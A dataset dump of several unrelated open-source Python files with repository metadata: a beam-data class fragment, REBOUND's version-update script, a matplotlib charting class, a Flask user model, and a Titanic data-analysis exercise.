for k in ['Beamdata','BeamdataQ','BeamdataU','BeamdataV'] :
self[k]*=that
def __sub__(self,that) :
new=self.copy()
for k in ['Beamdata','BeamdataQ','BeamdataU','BeamdataV'] :
try :
new[k]-=that[k]
except :
new[k]-=that
return new
def __add__(self,that) :
new=self.copy()
for k in ['Beamdata','BeamdataQ','BeamdataU','BeamdataV'] :
try :
new[k]+=that[k]
except :
new[k]+=that
return new
def __pow__(self,that) :
new=self.copy()
for k in ['Beamdata','BeamdataQ','BeamdataU','BeamdataV'] :
new[k]=new[k]**that
return new
|
gpl-2.0
| -5,566,125,991,815,063,000
| 38.181384
| 147
| 0.569262
| false
| 3.201248
| false
| false
| false
|
hannorein/rebound
|
update_version.py
|
1
|
1912
|
#!/usr/bin/python
# This script automatically creates a list of examples by reading the header in all problem.c files.
import glob
import subprocess
ghash = subprocess.check_output(["git", "rev-parse", "HEAD"]).decode("ascii").strip()
with open("version.txt") as f:
reboundversion = f.readlines()[0].strip()
print("Updating version to "+reboundversion)
with open("README.md") as f:
readme = f.readlines()
keep_lines_after_header = 5
with open("README.md","w") as f:
start_delete = -1
for i in range(0,len(readme)):
# [](https://rebound.readthedocs.org)
if "![Version]" in readme[i]:
readme[i] = "[](https://rebound.readthedocs.org)\n"
f.write(readme[i])
with open("src/rebound.c") as f:
reboundlines = f.readlines()
for i,l in enumerate(reboundlines):
if "**VERSIONLINE**" in l:
reboundlines[i] = "const char* reb_version_str = \""+reboundversion+"\"; // **VERSIONLINE** This line gets updated automatically. Do not edit manually.\n"
with open("src/rebound.c", "w") as f:
f.writelines(reboundlines)
with open("setup.py") as f:
setuplines = f.readlines()
for i,l in enumerate(setuplines):
if "version='" in l:
setuplines[i] = " version='"+reboundversion+"',\n"
if "GITHASHAUTOUPDATE" in l:
setuplines[i] = " ghash_arg = \"-DGITHASH="+ghash+"\" #GITHASHAUTOUPDATE\n"
with open("setup.py", "w") as f:
f.writelines(setuplines)
shortversion = reboundversion
while shortversion[-1] != '.':
shortversion = shortversion[:-1]
shortversion = shortversion[:-1]
print("To commit, copy and paste:")
print("\ngit commit -a -m \"Updating version to "+reboundversion+"\"")
|
gpl-3.0
| 159,939,837,923,048,500
| 36.490196
| 174
| 0.638598
| false
| 3.22973
| false
| false
| false
|
neuRowsATL/animatLabSimulationAPI
|
class_chartViz.py
|
1
|
5103
|
"""
Created by: Bryce Chung
Last modified: January 4, 2016
"""
import matplotlib.pyplot as plt
plt.ion()
global verbose
verbose = 3
class chartViz(object):
"""
This class is used to visualize chartData objects.
"""
def __init__(self):
self.data = {}
self.fig = None
self.axes = {}
self.arrange = None
self.chartFormat = None
self.title = ''
self.titleFormat = {}
def add_data(self, name, objChartData):
if objChartData not in self.data:
self.data[name] = objChartData.data
def set_arrange(self, arrange):
self.arrange = arrange
def set_format(self, chartFormat):
self.chartFormat = chartFormat
def set_title(self, title, titleFormat = {}):
self.title = title
self.titleFormat = titleFormat
def make_chart(self, hide=['Time']):
self.fig = plt.figure(figsize=(24,18))
self.fig.suptitle(self.title, **self.titleFormat)
axShare = None
if self.arrange is None:
axLen = 1
for dAxis in self.data:
axLen += len(np.where(np.array(self.data[dAxis].keys()) <> 'Time')[0])
i=1
for dAxis in self.data:
print "\n"
for d in dAxis.keys():
if d in hide:
continue
if verbose > 1:
print "Charting: %s" % d
print "Shared:"
print axShare
if len(self.axes) > 0:
ax = self.fig.add_subplot(axLen, 1, i, sharex=axShare)
else:
ax = self.fig.add_subplot(axLen, 1, i)
axShare = ax
if dAxis[d].datatype == 'analog':
ax.plot(dAxis['Time'].data, dAxis[d].data, 'b-')
elif dAxis[d].datatype == 'spike':
for spike in dAxis[d].data:
ax.axvline(spike, color='g')
ax.yaxis.set_ticklabels([])
if i < axLen:
ax.xaxis.set_ticklabels([])
self.axes[d] = ax
i += 1
else:
for ix, axis in enumerate(self.arrange):
print "\n"
if len(self.axes) > 0:
ax = self.fig.add_subplot(len(self.arrange), 1, ix+1, sharex=axShare)
print "Sharing axis: %s" % str(axShare)
else:
ax = self.fig.add_subplot(len(self.arrange), 1, ix+1)
print "No shared axis"
axShare = ax
for ix, chart in enumerate(self.arrange[axis]['charts']):
if chart.split('.')[1:] in hide:
continue
if verbose > 1:
print "Charting: %s" % chart
#print "Shared:"
#print axShare
color = 'k'
kwargs = {}
if chart in self.chartFormat.keys():
formatting = self.chartFormat[chart]
if 'color' in formatting.keys():
kwargs['color'] = self.chartFormat[chart]['color']
if verbose > 1:
print "Charting: %s" % chart
print kwargs
strDataObj = chart.split('.')[0]
strChart = ''.join(chart.split('.')[1:])
data = self.data[strDataObj]
if data[strChart]['datatype'] == 'analog':
ax.plot(data['Time']['data'], data[strChart]['data'], **kwargs)
elif data[strChart]['datatype'] == 'spike':
if len(self.arrange[axis]['charts']) > 1:
height = 1./len(self.arrange[axis]['charts'])
else:
height = 1
for spike in data[strChart]['data']:
ax.axvline(spike, ymin=ix*height, ymax=(ix+1)*height-height*0.1, **kwargs)
ax.yaxis.set_ticklabels([])
ax.set_ylabel(self.arrange[axis]['name'])
if ix+1 < len(self.arrange):
ax.xaxis.set_ticklabels([])
self.axes[axis] = ax
|
gpl-2.0
| 2,067,055,089,075,999,700
| 35.45
| 102
| 0.386047
| false
| 4.836967
| false
| false
| false
|
cloughrm/Flask-Angular-Template
|
backend/pastry/models.py
|
1
|
2070
|
import random
import hashlib
from flask import current_app as app
from pastry.db import mongo
from werkzeug.security import generate_password_hash, check_password_hash
from itsdangerous import TimedJSONWebSignatureSerializer, SignatureExpired, BadSignature
class User(object):
def __init__(self, username, password):
self.set_args(
username=username,
password=generate_password_hash(password)
)
def set_args(self, **kwargs):
self.username = kwargs.get('username')
self.password = kwargs.get('password')
def create(self):
object_id = mongo.db.users.insert({
'username': self.username,
'password': self.password,
'api_key': self.generate_api_key(),
'admin': False,
'groups': ['user'],
'verified': False,
})
return object_id
def exists(self):
user = mongo.db.users.find_one({'username': self.username})
if user:
self.set_args(**user)
return True
def generate_auth_token(self, expires_in=86400):
s = TimedJSONWebSignatureSerializer(app.config.get('SECRET_KEY'), expires_in=expires_in)
token = s.dumps({'username': self.username})
return token
def generate_api_key(self):
return hashlib.md5(str(random.getrandbits(256))).hexdigest()
def verify_password(self, password):
return check_password_hash(self.password, password)
@staticmethod
def verify_api_key(api_key):
return mongo.db.users.find_one({'api_key': api_key})
@staticmethod
def verify_auth_token(token):
s = TimedJSONWebSignatureSerializer(app.config.get('SECRET_KEY'))
try:
data = s.loads(token)
except SignatureExpired:
app.logger.info('Expired Token')
return False
except BadSignature:
app.logger.warning('Invalid Token')
return False
user = mongo.db.users.find_one({'username': data['username']})
return user
|
mit
| -8,695,304,718,168,323,000
| 30.363636
| 96
| 0.617391
| false
| 4.115308
| false
| false
| false
|
dmitryfizteh/MachineLearning
|
Week_1/Task_1/titanic.py
|
1
|
2465
|
import pandas
from scipy.stats.stats import pearsonr
print("Неделя №1. Задание №1")
# Функция вывода ответа
def write_result(result, index):
print("Ответ: " + str(result))
file = open("./Answers/" + str(index) + ".txt", "w")
file.write(result)
file.close()
data = pandas.read_csv('./Data/titanic.csv', index_col='PassengerId')
print("\nРешение задачи №1")
a1 = data['Sex'].value_counts()
result = str("%d %d" % (a1['male'],a1['female']))
write_result(result, 1)
print("\nРешение задачи №2")
a2 = data['Survived'].value_counts()
#print("%d погибло, %d выжило" % (a2[0],a2[1]))
result = str("%.2f" % (round(a2[1]/(a2[0]+a2[1])*100,2)))
write_result(result, 2)
print("\nРешение задачи №3")
a3 = data['Pclass'].value_counts()
result = str("%.2f" % (round(a3[1]/(a3[1]+a3[2]+a3[3])*100,2)))
write_result(result, 3)
print("\nРешение задачи №4")
a4_1 = (data['Age'].dropna()).mean()
a4_2 = (data['Age'].dropna()).median()
result = str("%0.2f %0.2f" % (a4_1, a4_2))
write_result(result, 4)
print("\nРешение задачи №5")
a5 = pearsonr(data['SibSp'], data['Parch'])
#print('Коэффициент корреляции r= %0.2f, уровень значимости p = %0.3f.' % a5)
result = str("%0.2f" % a5[0])
write_result(result, 5)
print("\nРешение задачи №6")
a6 = data[data['Sex'] == "female"]
a6 = a6['Name']
names = list()
for (key,value) in enumerate(a6):
value = value.replace("Mrs. ","")
value = value.replace("Miss. ","")
value = value.replace("(","")
value = value.replace(")","")
value = value.replace('"','')
value = value.split(", ")
names_i = value[0]
names.append(value[0])
for name in value[1].split(" "):
names.append(name)
# Функция поиска самого частого элемента в массиве
def Freq2(b):
d = {}
m, i = 0, 0 # Максимальная частота и индекс в словаре
for x in b: # Пробегаем в цикле исходный массив
d[x] = d[x] + 1 if x in d else 1 # Если ключ уже есть, прибавляем 1, если нет, записываем 1
if d[x] > m:
m, i = d[x], x # Запоминаем максимум и его индекс
#return {i:m}
return i
result = str("%s" % (Freq2(names)))
write_result(result, 6)
|
gpl-3.0
| -2,582,688,218,459,481,000
| 26.376623
| 95
| 0.610057
| false
| 1.918107
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.